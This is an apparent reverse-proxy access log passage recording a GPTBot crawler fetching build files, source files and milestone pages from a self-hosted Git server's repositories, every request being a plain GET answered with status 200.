GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?state=open" [Client 74.7.227.38] [Length 8457] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?state=closed" +[17/Feb/2026:16:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10219] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11047] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15175] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" +[17/Feb/2026:16:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 23814] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 23828] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 23815] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/types.ts?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" +[17/Feb/2026:16:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8514] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostcomplete&state=open" +[17/Feb/2026:16:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8509] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastcomplete&state=open" +[17/Feb/2026:16:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21641] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16827] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10233] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19748] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" +[17/Feb/2026:16:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19751] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" +[17/Feb/2026:16:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" +[17/Feb/2026:16:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 23776] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:16:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fPKG-00.toc" [Client 74.7.227.38] [Length 23922] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:16:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fPYZ-00.toc" [Client 74.7.227.38] [Length 23917] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fEXE-00.toc" [Client 74.7.227.38] [Length 23939] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:16:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:16:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:16:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:16:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:16:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:16:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:16:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:16:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject" [Client 74.7.227.38] [Length 115883] [Gzip 13.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:16:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor?display=rendered" [Client 74.7.227.38] [Length 14498] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:16:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor?display=rendered" [Client 74.7.227.38] [Length 14522] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:16:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor?display=rendered" [Client 74.7.227.38] [Length 14519] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:16:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16495] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" +[17/Feb/2026:16:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" +[17/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11979] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" +[17/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 12151] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" +[17/Feb/2026:16:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 20864] [Gzip 9.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 42679] [Gzip 12.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 25001] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.02] [Sent-to 